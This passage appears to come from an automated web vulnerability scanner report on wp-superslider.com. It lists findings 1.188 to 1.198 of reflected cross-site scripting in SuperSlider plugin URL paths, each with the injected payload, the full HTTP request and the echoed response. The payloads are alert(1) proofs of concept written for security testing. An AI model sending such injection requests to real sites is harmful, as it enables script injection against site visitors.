Path:   /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dbd"><script>alert(1)</script>faa582e2f65 was submitted in the REST URL parameter 4. This input was echoed as c8dbd\"><script>alert(1)</script>faa582e2f65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerptc8dbd"><script>alert(1)</script>faa582e2f65/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerptc8dbd\"><script>alert(1)</script>faa582e2f65/plugin-data/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

1.188. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367a3"><script>alert(1)</script>72b3425ad17 was submitted in the REST URL parameter 5. This input was echoed as 367a3\"><script>alert(1)</script>72b3425ad17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data367a3"><script>alert(1)</script>72b3425ad17/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data367a3\"><script>alert(1)</script>72b3425ad17/superslider/ssExcerpt/default/default.css" />
...[SNIP]...

1.189. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51aa1"><script>alert(1)</script>6001cc5eecf was submitted in the REST URL parameter 6. This input was echoed as 51aa1\"><script>alert(1)</script>6001cc5eecf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider51aa1"><script>alert(1)</script>6001cc5eecf/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider51aa1\"><script>alert(1)</script>6001cc5eecf/ssExcerpt/default/default.css" />
...[SNIP]...

1.190. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 116ab"><script>alert(1)</script>ee2c400a80f was submitted in the REST URL parameter 7. This input was echoed as 116ab\"><script>alert(1)</script>ee2c400a80f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt116ab"><script>alert(1)</script>ee2c400a80f/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt116ab\"><script>alert(1)</script>ee2c400a80f/default/default.css" />
...[SNIP]...

1.191. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5882b"><script>alert(1)</script>8f70873ebba was submitted in the REST URL parameter 8. This input was echoed as 5882b\"><script>alert(1)</script>8f70873ebba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default5882b"><script>alert(1)</script>8f70873ebba/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674554; expires=Thu, 02-Feb-2012 19:22:34 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default5882b\"><script>alert(1)</script>8f70873ebba/default.css" />
...[SNIP]...

1.192. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44970"><script>alert(1)</script>402867fa415 was submitted in the REST URL parameter 9. This input was echoed as 44970\"><script>alert(1)</script>402867fa415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css44970"><script>alert(1)</script>402867fa415 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css44970\"><script>alert(1)</script>402867fa415" />
...[SNIP]...

1.193. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bf0"><script>alert(1)</script>d53f8f09d5f was submitted in the REST URL parameter 1. This input was echoed as 75bf0\"><script>alert(1)</script>d53f8f09d5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site75bf0"><script>alert(1)</script>d53f8f09d5f/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site75bf0\"><script>alert(1)</script>d53f8f09d5f/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

1.194. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31761"><script>alert(1)</script>9a2ec4ef367 was submitted in the REST URL parameter 2. This input was echoed as 31761\"><script>alert(1)</script>9a2ec4ef367 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content31761"><script>alert(1)</script>9a2ec4ef367/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content31761\"><script>alert(1)</script>9a2ec4ef367/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

1.195. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214f6"><script>alert(1)</script>21d72fb4419 was submitted in the REST URL parameter 3. This input was echoed as 214f6\"><script>alert(1)</script>21d72fb4419 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins214f6"><script>alert(1)</script>21d72fb4419/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins214f6\"><script>alert(1)</script>21d72fb4419/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

1.196. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c380"><script>alert(1)</script>942fd5177a7 was submitted in the REST URL parameter 4. This input was echoed as 7c380\"><script>alert(1)</script>942fd5177a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login7c380"><script>alert(1)</script>942fd5177a7/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login7c380\"><script>alert(1)</script>942fd5177a7/plugin-data/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

1.197. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53af1"><script>alert(1)</script>8d9b584a4b9 was submitted in the REST URL parameter 5. This input was echoed as 53af1\"><script>alert(1)</script>8d9b584a4b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data53af1"><script>alert(1)</script>8d9b584a4b9/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data53af1\"><script>alert(1)</script>8d9b584a4b9/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

1.198. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d94d5"><script>alert(1)</script>8937e1e9ddf was submitted in the REST URL parameter 6. This input was echoed as d94d5\"><script>alert(1)</script>8937e1e9ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data/supersliderd94d5"><script>alert(1)</script>8937e1e9ddf/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
